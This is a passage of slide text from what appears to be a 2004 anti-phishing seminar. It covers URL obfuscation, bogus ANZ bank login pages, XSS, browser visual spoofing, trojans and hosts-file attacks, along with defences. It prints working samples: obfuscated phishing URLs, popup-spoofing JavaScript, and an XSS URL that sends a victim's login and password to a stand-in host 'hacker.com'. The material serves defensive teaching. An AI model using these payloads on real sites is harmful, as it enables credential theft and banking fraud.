  • 32. IE vulnerability in handling URL • Works with DNS server which accepts dummy subdomain, e.g. http-equiv.dyndns.org • http://www.microsoft.com.technet.security.bulletin.MS04- 029.mspx.12345.123451234512345678901234567123456789 0123456789.box&&cm=&ce=3&hl=malware.http- equiv.dyndns.org/~http-equiv/mwaresoft.html Effective = *.http-equiv.dyndns.org/~http-equiv/mwaresoft.html • Reference URL: http://www.malware.com/malwaresoft.html 32 (PHISHING )
  • 33. 2.2 URL Obfuscation Attack • Shortened URL – http://www.rapp.org/url/ • PISA http://www.rapp.org/url/?IUVST6C8 • Workshop: Phishing Exposed http://www.rapp.org/url/?KRRQ7YYH – http://csua.org/u/ • PISA http://csua.org/u/9fy • Workshop: Phishing Exposed http://csua.org/u/9iu 33 (PHISHING )
  • 34. Demonstration 2 URL Obfuscation Attacks 34 (PHISHING )
  • 35. 2.3 Face Lift ( ) • Use URL Redirect or similar technology • Take advantage of the real web site’s face to confuse the identity of Bogus Login Page <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/"> Online Banking Main Page (real) Online Login (bogus) Usename myuserid Password ******* 35 (PHISHING )
  • 36. Case Study ANZ bank phishing Email content : : “%##” Hexidecimal format : http://anz.com.au%32inetbank%32%32%32@%36%31%2E%31%30%2E%31%32 : %30%2E%32%30%30 %32%37%38%34/%69%6E%65%74%62%61%6E%6B/%6 9%6E%64%65%78%2E%68%74%6D Bogus URL – old technique http://anz.com.au2inetbank222 @61.10.120.200:2784/inetbank/index.htm 36 (PHISHING )
  • 37. Content of BOGUS web page “http://61.10.120.200:2784/inetbank/index.htm” : <script LANGUAGE="JavaScript"> : SafeAddOnload(PUWStart); 1 PopUp page Login gPopupWindow = new PopupWindow("login.htm", 350, 150); gPopupWindow.toolbar = false; gPopupWindow.statusbar = true; gPopupWindow.resizable = true; gPopupWindow.ontop = true; </script> </head> <body bgcolor="#FFFFFF" text="#000000"> 2 Background Redirect <META HTTP-EQUIV="Refresh" CONTENT="0; 37 url=http://www.anz.com.au/"> (PHISHING )
  • 38. Online Banking Login (Bogus) 1 PopUp page Login No SSL 2 Background Redirect <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/"> 38 (PHISHING )
  • 39. Case Study ANZ bank phishing Face Lift 2 2 1 userid ******** 39 (PHISHING )
  • 40. Case Study ANZ bank phishing Track Hiding After entering PIN SSL padlock shown ??!! 40 (PHISHING )
  • 41. Online Banking Login (real) Real digital cert of web site Real login has SSL padlock 41 (PHISHING )
  • 42. Defense vs. Cousin URL (Prevention) • Use a consistent and persistent web interface • Communicate a Single Simple Domain name XYZBank owns these domains and have web servers for each xyzbank.com xyzcorp.com xyzgroup.com They use these domains for Online banking online-xyzbank.com secure-xyzbank.com They use these domains for HK and Australia Online banking online-xyzbank.com.hk secure-xyzbank.com.au 42 (PHISHING )
  • 43. Defense vs. Cousin URL (Prevention) • Is this better? XYZBank owns these domains xyzbank.com (only active domain) xyzcorp.com (forward to xyzbank.com) xyzgroup.com (forward to xyzbank.com) They these SubDomain for Online banking online.xyzbank.com (personal banking) secure.xyzbank.com (corporate banking) They use these URL paths for HK and Australia Online banking online.xyzbank.com/hk/ secure.xyybank.com/au/ 43 (PHISHING )
  • 44. Defense vs. Cousin URL (Detection) • Brand Management • Domain Monitoring Can be Outsourced • Web Crawling • Intelligence Report from Spam Filtering services 44 (PHISHING )
  • 45. Detection (Server side) • Detect Mirroring from Copycat Web Site – Monitor large volume traffic, especially from a single subnet – Placing Honeypot links (invisible links with no effective use) to detect access check “access log” • Detect Referral Site – At your web server monitor the referrer information from the “access log”, it may give you information of referral site, search engine or attacker by FaceLift / Framing /etc. attack 45 (PHISHING )
  • 46. Server and Site Design Reference • PISA’s HK e-Commerce Security Survey 2003 – Non-intrusive and Anonymous study on 25 local on-line transaction sites • Application design • SSL and Encrypted Communication Digital Certificate Implementation • Password Management • Operation Control – URL • http://www.pisa.org.hk/projects/websec2003/websec2003.htm 46 (PHISHING )
  • 47. Detection (Client side) • Browser – check digital certificate; and turn on alert when browser enters or leaves SSL mode 47 (PHISHING )
  • 48. Detection (Client side) • SpoofStick (browser • eBay Toolbar (browser plug-in) plug-in – Incorporated “Web CallerID” technology (acquired from WholeSecurity) to detect suspicious activity in web page. Web CallerID acts like a heuristic filter for phishers, detecting previously undiscovered spam • http://www.eweek.com/art icle2/0,1759,1636422,00.a sp 48 (PHISHING )
  • 49. Detection (Client) • Some Antivirus programs detect malicious popup javascript in web page 49 (PHISHING )
  • 50. Detection (Client) • http://%32%31%31%2E%39%37%2E%32%34%38%2E%36 %30:%38%37/%63%69%74/%69%6E%64%65%78%2E%68 %74%6D ( http://211.97.248.60:87/cit/confirm.htm) 50 (PHISHING )
  • 51. 2.4 Cross-Site Scripting • A cross-site scripting vulnerability allows the introduction of malicious content (scripts) on a web site, that is then served to users (clients) – Malicious scripts get executed on clients that trust the web site – Problem with potentially all client-side scripting languages • Use “XSS” to refer to these vulnerabilities, to avoid confusion with “CSS” (cascading style sheets) 51 (PHISHING )
  • 52. XSS Concept • Any way to fool a legitimate web site to send malicious code to a user’s browser • Almost always involves user content (third party) – Error messages – User comments – Links • References – http://www.cert.org/archive/pdf/cross_site_scripting.pdf – http://www.spidynamics.com/support/whitepapers/SPIcross -sitescripting.pdf 52 (PHISHING )
  • 53. Why the Name • You think that you interact with site Z • Site Z has been poisoned by attacker • The “poison” (e.g. JavaScript) is sent to you, along with legitimate content, and executes. It can exploit browser vulnerabilities, or contact site M and steal your cookies, usernames and passwords... Z Surfing Poison Poison Hostile Code Executes M 53 (PHISHING )
  • 54. XSS Risks • Theft of account credentials and services • User tracking (stalking) and statistics • Misinformation from a trusted site • Denial of service • Exploitation of web browser – Create phony user interface – Exploit a bug in the browser – Exploit a bug in a browser extension such as Flash or Java • Etc. 54 (PHISHING )
  • 55. XSS Risks - Stolen Account Credentials • With XSS, it may be possible for your credentials to be stolen and used by attacker • With sites requiring authentication need to use a technological solution to prevent continuously asking users for passwords – Credentials have the form of a SessionID or nonce • Url encoding (GET method) – http://www.site.com?ID=34539027644 • Cookies are commonly used to store credentials – These are usually accessible to client-side scripts 55 (PHISHING )
  • 56. Cookie Mechanism and Vulnerabilities • Used to store state on the client browser • Access Control – Includes specification of which servers can access the cookie (a basic access control) • Including a path on the server – So cookie can be used to store secrets (sessionIDs or nonces) 56 (PHISHING )
  • 57. XSS - Point • XSS vulnerabilities fool the access control mechanism for cookies • The request for the cookie (by scripts) comes from the poisoned server, and so is honored by the client browser – No vulnerabilities needed in the client browser 57 (PHISHING )
  • 58. XSS Risk - Privacy and Misinformation • Scripts can “spy” on what you do – Access history of sites visited – Track content you post to a web site • Scripts can misinform – Modify the web page you are viewing – Modify content that you post • Privacy (“I have nothing to hide”) – Knowledge about you can be valuable and be sued against you • Divorces, religion, hobbies, opinions • etc. 58 (PHISHING )
  • 59. Example: Google’s XSS Vulnerability • Just get to public at Oct 20. • Scripts can be injected into Google to make it become a subscription service: – http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%7 0%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75 %6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28% 64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65 %6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73% 72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69 %6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27 59 (PHISHING )
  • 60. Example: Google’s XSS Vulnerability 60 (PHISHING )
  • 61. XSS Risk - Denial of Service • Nasty JavaScripts can make your web site inaccessible – Make browsers crash or become inoperable – Redirect browsers to other web sites 61 (PHISHING )
  • 62. XSS Risk - Silent Install • Exploitation of browser vulnerabilities – JavaScript, ActiveX, etc. allow the exploitation of browser vulnerabilities • Run locally on your machine • User security confirmation bypass vulnerability in Microsoft Internet Explorer 6.0 SP2: – http://securityfocus.com/bid/11200/ – Allows malicious users to trivially bypass the requirement for user confirmation to load JavaScript or ActiveX – Installation of malicious code 62 (PHISHING )
  • 63. XSS Risk - Phishing • User Interface Modifications – Present fake authentication dialogs, capture information then perhaps redirect user to real web site – Replace location toolbar to make user think they are visiting a certain web site • Phishing Scenario • Victim logs into a web site • Attacker has spread “mines” using an XSS vulnerability • Victim stumbles upon an XSS mine • Victim gets a message saying that their session has expired, and they need to authenticate again • Victim’s username and password are sent to attacker 63 (PHISHING )
  • 64. Demonstration 3 - www.pisabank.com 64 (PHISHING )
  • 65. After successful user login... 65 (PHISHING )
  • 66. However, if login failed... 66 (PHISHING )
  • 67. Try to put scripts in URL... 67 (PHISHING )
  • 68. Reveal the injected scripts... 68 (PHISHING )
  • 69. Target to inject codes like this... 69 (PHISHING )
  • 70. We create the following url... • http://www.pisabank.com/banklogin.jsp?serviceName=PisabankCaastAcce ss&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_ URL=http://www.pisabank.com&err=%3C/form%3E%3Cform%20action= %22login1.asp%22%20method=%22post%22%20onsubmit=%22XSSimag e%20=%20new%20Image;XSSimage.src='http://www.hacker.com/'%20% 2b%20document.forms(2).login.value%20%2b%20':'%20%2b%20docume nt.forms(2).password.value;%22%3E 70 (PHISHING )
  • 71. Put the url in scam mails... 71 (PHISHING )
  • 72. When the hyperlink is clicked... 72 (PHISHING )
  • 73. After the user login, nothing special... 73 (PHISHING )
  • 74. However... • In www.hacker.com’s web server log, login name and password are recorded – 192.168.0.1 - - [14/Oct/2004:11:01:52 +0800] "GET /bernard:IlovePisa HTTP/1.1" 404 719 74 (PHISHING )
  • 75. XSS - Prevention • For users: – disable scripting in browser (some personal firewall can selectively block/allow scripts from particular web sites) – do not trust links in e-mails, type url directly in browser – always logout before browsing elsewhere – keep up with web browser patches and versions 75 (PHISHING )
  • 76. XSS - Prevention • For administrators/developers: – User input should be parsed and filtered properly, especially < > “ ‘ % ; ) ( & + - – Some decent guidelines for input filtering can be found in the OWASP Requirements document "OWASP Guide to Building Secure Web Applications and Web Services“ • http://www.owasp.org/documentation/guide.html – Output based on Input parameters should be encoded into ISO 8859 -1 for special characters • http://www.cert.org/advisories/CA-2000-02.html 76 (PHISHING )
  • 77. XSS - Prevention • For administrators/developers: – For cookies: set the HttpOnly flag. Scripts that run in a browser can’t access cookie values with flag set – Keep up with web server patches – periodically test for XSS vulnerabilities by using web application scanners • e.g. Web Scarab http://www.owasp.org/software/webscarab.html 77 (PHISHING )
  • 78. XSS - Detection • XSS exploits can be detected by reviewing web server access log, e.g.: 192.168.1.152 - - [14/Oct/2004:10:38:11 +0800] "GET /banklogin.jsp?serviceName=PisabankCaastAccess&templateName=prod_sel.forte &source=Pisabank&AD_REFERRING_URL=http://www.pisabank.com&err=%3C/form%3E% 3Cform%20action=%22login1.jsp%22%20method=%22post%22%20onsubmit=%22XSSimag e%20=%20new%20Image;XSSimage.src='http://www.hacker.com/'%20%2b%20document .forms(2).login.value%20%2b%20':'%20%2b%20document.forms(2).password.value ;%22%3E HTTP/1.1" 200 4058 78 (PHISHING )
  • 79. XSS - Detection • XSS exploits can also be detected by network- based Intrusion Detection System (IDS), e.g. [**] WEB-MISC cross site scripting attempt [**] 10/21-23:04:54.960511 192.168.1.152:3341 -> 192.168.1.100:80 TCP TTL:128 TOS:0x0 ID:28082 IpLen:20 DgmLen:307 DF ***AP*** Seq: 0xAB1F9A5C Ack: 0xEFB2E94B Win: 0x4470 TcpLen: 20 47 45 54 20 2F 62 61 6E 6B 6C 6F 67 69 6E 2E 6A GET /banklogin.j 73 70 3F 65 72 72 3D 3C 73 63 72 69 70 74 3E 61 sp?err=<script>a 6C 65 72 74 28 27 58 53 53 27 29 3C 2F 73 63 72 lert('XSS')</scr 69 70 74 3E 20 48 54 54 50 2F 31 2E 31 0D 0A 41 ipt> HTTP/1.1..A 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 ccept: */*..Acce 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A 68 2D pt-Language: zh- 68 6B 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 hk..User-Agent: 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D Mozilla/4.0 (com 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 2E patible; MSIE 6. 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 0; Windows NT 5. 30 29 0D 0A 48 6F 73 74 3A 20 77 77 77 2E 70 69 0)..Host: www.pi 73 61 62 61 6E 6B 2E 63 6F 6D 0D 0A 43 6F 6E 6E sabank.com..Conn 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 ection: Keep-Ali 76 65 0D 0A 43 6F 6F 6B 69 65 3A 20 4A 53 45 53 ve..Cookie: JSES 53 49 4F 4E 49 44 3D 32 42 43 43 39 44 45 36 43 SIONID=2BCC9DE6C 44 43 46 45 44 44 37 45 32 35 42 43 46 33 44 36 DCFEDD7E25BCF3D6 38 39 35 38 30 46 32 0D 0A 0D 0A 89580F2.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 79 (PHISHING )
  • 80. 2.5 Visual spoofing • Target to the web browser interface • Display fake menu bar, status bar, dialogue box on a web browser – The address bar displays the fake URL address – The status bar shows displays the golden “lock” icon indicating a secure SSL session, which has often been cited as a differentiator between legitimate sites and scams – The download or installation dialogue box shows fake information 80 (PHISHING )
  • 81. How it works? Graphic substitution approach 1. The bogus web page are opened without the menu bar and status bar window.open(“bogus.htm", "_blank", "height=700, width=683, location=no, menubar=no, toolbar=no, status=no, resizable=no, scrollbars=no"); 2. The menu bar and status bar (with the golden “lock” icon) images are displayed at the top and bottom of the bogus web page to disguise as part of the browser user interface 81 (PHISHING )
  • 82. Graphic Substitution Approach Header image Bogus web content Footer image 82 (PHISHING )
  • 83. Graphic Substitution Approach 3. Combine with the java commands “window.createPopup()” and “popup.show()”, attacker can hijack the entire user’s desktop and construct a fake interface to capture and manipulate what the user sees. op=window.createPopup(); op.document.body.innerHTML="...html..."; op.show(0,0,screen.width,screen.height,document.body); 83 (PHISHING )
  • 84. Browser UI Rebuild Approach 1. The bogus web page are opened without the menu bar and status bar 2. Some browser user interface functions (including the certification view function) are rebuilt on the bogus web page through download XUL (XML- based User interface Language. Standards based language developed by mozilla.org to create cross- platform user interfaces for Mozilla-based products such as the browser.) Reference: http://www.nd.edu/~jsmith30/xul/test/spoof.html 84 (PHISHING )
  • 85. Browser UI Rebuild Approach 85 (PHISHING )
  • 86. Overriding Page Content Approach • IE browser allows creation of chromeless windows which are screen objects that do not have the normal borders and other controls attached to them. Through javascript, they can be positioned to hide or replace (by “sitting on top”) underlying content. • Attackers make use of these chromeless windows to spoof the graphical components of browser, such as URL address bar and dialogue boxes for file download, software installation, and bookmark. 86 (PHISHING )
  • 87. 2.5 Visual spoofing • Defense – Keep your web browser updated – Disable the javascript functions which hide your web browser menu and status bar – Check the page info and property of the view web page before proceed – Print mark browser UI 87 (PHISHING )
  • 88. Demonstration 4 Visual Spoofing Graphical Substitution FireFox Browser UI Rebuild Approach Chromeless Window 88 (PHISHING )
  • 89. 2.6 Other Attack Trojan, Keylogger, Screen Grabber Attacker can lure victim to install Trojan horse program through a bogus software patch or update web page. Once the victim has installed the Trojan horse program, the attacker can closely monitor the victim PC activities by capturing its keystroke and screen display. – Keylogger • Capture the victim keystroke in all windows – Screen Grabber • Screen dump or even video stream the victim screen display 89 (PHISHING )
  • 90. Demonstration 5 Keylogger and Screen Grabber Using BackOrifice 90 (PHISHING )
  • 91. 2.6 Other Attack Man in the Middle Attack By poisoning the victim DNS server, attacker can redirect the traffic of a legitimate site to the attacker server where the attacker can sniff password information even in the HTTPS connection. Legitimate web server The victim thought that he is talking to the legitimate site Victim PC Actually, the victim is talking to the attack server Attacker server which sniff the password information and proxy the HTTPS traffic between the victim and legitimate web server 91 (PHISHING )
  • 92. New Quiet Attack (4-Nov-2004) • Change of HOST file – Capture online banking details WITHOUT requiring users to click on a website link – Works even if USER TYPE IN URL MANUALLY – Working Principle • Execution of trojan to modify HOSTS file • HOSTS file override DNS resolution • User brought to malicious site next time he go to that online transaction site. • Defense – Ensure Windows Scripting Host is disabled – Have AV and antispyware software installed • Reference: http://www.vnunet.com/news/1159171 92 (PHISHING )
  • 93. Defense Strategies At end user side • NEVER follow any link in e-mail, post article, chart room, ICQ message, or Banner advertising • Enable your personal firewall to allow only necessary traffic to go through • Keep your software (mail reader, web browser, virus definition) patched and updated • Use the PKI properly 93 (PHISHING )
  • 94. Defense Strategies At server side • Make sure the web programs are fully tested such as input parsing and invalid input handling • Monitor any cousin domain created • Monitor any phishing e-mail or post message that targeting your organization in major search engines and your Honeypot accounts • Monitor your web server log and identify any suspicious web pages from the referer information • Provide secure web proxy service for their customers. This web proxy can only connect their legitimate web sites and nothing else • Provide secondary authentication for transaction. E.G. send one-time password to client through mobile SMS 94 (PHISHING )
  • 95. Defense Strategies At system and network admin side • Deploy anti-spamming and anti-virus measures E.G. Black/white lists, keywords lists, semantics analysis, various rules and characteristics, Bayesian Filtering, Challenge-Response Filtering, SMTP Session Verification, TurnTideT Anti-spam Router … etc. • Deploy Firewall, Intrusion Detection System and Intrusion Prevention System to block attack and Trojan backdoor connections • Put all non-server machines in private IP networks • Educate the users and make sure they stay with the updated software patch At the software vendor side • Do not assume users have certain security knowledge or awareness to use their products safety and wisely • Do not lower the security level in their product default setting • Don’t just make money. Spend more time to fix the bug and fully test the product 95 (PHISHING )
  • 96. The Picture of Trust Perception - Social engg. Look and Feel - Cousin URL Message and Tone - Face Lift Trust Branding Trust Physical Settings CA Weak Weak Operation? Operational Security Validation Chain of Trust Certificate & Revocation Email Sender Validation XSS Vulnerabilities Application Application Apps Visual *Browser* Transport (Host) Spoofing SSL Transport MITM, Network (Internet) DNS, Hosts file Network Routing DNS poison Network MITM, Link (LAN) ARP Sniffing Link Resolution Client IT Infrastructure Server 96 (PHISHING )
  • 97. Defense Strategies • Policy and User Education • Prevention • Detection • Incident Response and Collaboration 97 (PHISHING )
  • 98. 3.1 Policy and User Education • – HKMA Guideline • Circular on monitoring Online Banking Regulation of Bogus web site – Regulating the use of domain name • HKMA and HKIRC cooperate in regulating the use of words “bank” and “banque” in “.hk” domain • Is a further regulation to mandate all authorized banking institutions to use “.bank.hk” a useful strategy? – Note: it still cannot stop technique like “Visual Spoofing” • Human is the weakest link – Trust too easily 98 (PHISHING )
  • 99. 3.1 User Education • Consumer Education – Pamphlet “Internet Banking – Keeping Your Money Safe” • by HKAB(Hong Kong Association of Banks) http://www.hkab.org.hk/PDF/customer_info/ebanking _e.pdf – TV and Radio programs • by HKMA and HKPF – Public seminars • by HKCERT – Alerts on some bank web sites 99 (PHISHING )
  • 100. 3.2 Prevention Technical • HKMA announced in June 2004 that within 12 months, all authorized institutions should deploy two-factor authentication in high risk transactions – One time password (e.g. secure ID token, SMS one time password) – Digital certificate in Smart ID Card 100 (PHISHING )
  • 101. 3.2 Other Prevention & Detection • See previous sections on specific attacks 101 (PHISHING )
  • 102. 3.4 Incident Response and Collaboration • Report and Alert – SFC (Security and Futures Commission) reward the report of fraudulent copycat websites and phishing scams targeting Hong Kong investors. • Smart Investor Award http://www.hksfc.org.hk/eng/investor/html/smart_investor_award.h tm – HKMA and SFC publish Unregistered financial and stock transaction web site • http://www.hkma.gov.hk • http://www.hksfc.org.hk/chi/investor/html/unlicensed_overseas_comp.htm – Quick reaction and publishing of news in Media and Press 102 to alert the public (PHISHING )
  • 103. 3.4 Incident Response and Collaboration • Local Collaboration – Police, HKCERT and ISPs cooperating to close down bogus web sites in Hong Kong – Police, HKMA and HKAB has standing collaboration body, meeting regularly on banking fraud prevention and response 103 (PHISHING )
  • 104. 3.4 Incident Response and Collaboration • Cross Border Collaboration – Police plays an important role in cross-border crimes like phishing – CERT Teams around the world are developing close collaboration in information exchange and pin down of bogus website Global Asia Pacific 104 (PHISHING ) http://www.cert.org/csirts/images/map-full.gif
  • 105. 3.5 Long Term Development (Technology Infrastructure) PHISHING & SPAM One of the Core Issues: How to validate identity of Sender and Sender Domain, and if the Sending Mail Server is authorized? • In the current Internet Mail Infrastructure implementation, there is flaw in the validation of sender Plausible but not widely implemented methods of validation • Sender Validation – Use Digital Signature (S/MIME or PGP) • Authenticated SMTP to minimize abuse of Open Mail Relay – RFC2554 - SMTP Service Extension for Authentication – RFC2487 - SMTP Service Extension for Secure SMTP over TLS 105 (PHISHING )
  • 106. 3.5 Long Term Development (Technology Infrastructure) • Domain Validation (work at DNS level) – Standard based • Reverse DNS Lookup – Proprietary Solution • AOL: SPF Sender ID • Microsoft: Caller ID • Yahoo: Domain Keys 106 (PHISHING )
  • 107. Sender Policy Framework SPF DNS server of SENDER.COM 2. Recipient Mail Gateway 3. DNS server returns a list of issues a DNS query to authorized IP addresses of SENDER.COM, asking for mail servers for the list of authorized IP addresses of mail servers ? SENDER.COM 4.Check if the Sender Mail Server is in the authorized IP address. If so, the mail server is authorized and mail is forwarded to recipient’s 1.Sender sends out email from SENDER.COM mailbox SMTP Sender Recipient Mail Server Mail Gateway Recipient 107 (PHISHING )
  • 108. Proprietary Domain Validation • Caller ID – “XML version of SPF” with more options • Domain Keys – Use PKI. Validate sender identity AND message integrity • Recent Development – Domain Keys was submitted as RFC to IETF – SPF merge with Caller ID to Sender ID. – SenderID submitted to IETF as RFC in July 2004; got rejected in Oct 2004 due to compatibility and IP issue. Microsoft had re-submitted with amendment. The industry is still discussing the new amendment. 108 (PHISHING )
  • 109. 3.5 Long Term Development (Legislation) PHISHING & SPAM – Legislate on cross-border jurisdiction, and establish mutually accepted process to handle phishing and spamming – Legislate on anti-spam, to reduce Open Mail Relay and Directory Harvesting Attacks 109 (PHISHING )
  • 110. Conclusion • Phishing adversely impacts the growth of e-Commerce • Phishermen are using both old social engineering tricks and more advanced technologies now. • Should adopt Multi-dimensional Anti-Phishing Strategies – User Education, Prevention, Detection, Incident Response and Notification – Collaboration of Law Enforcement and Business sector, and crossing the border are vital elements of success. • Hit SPAM can hit Phishing. There is a need for legislative and technological reforms. 110 (PHISHING )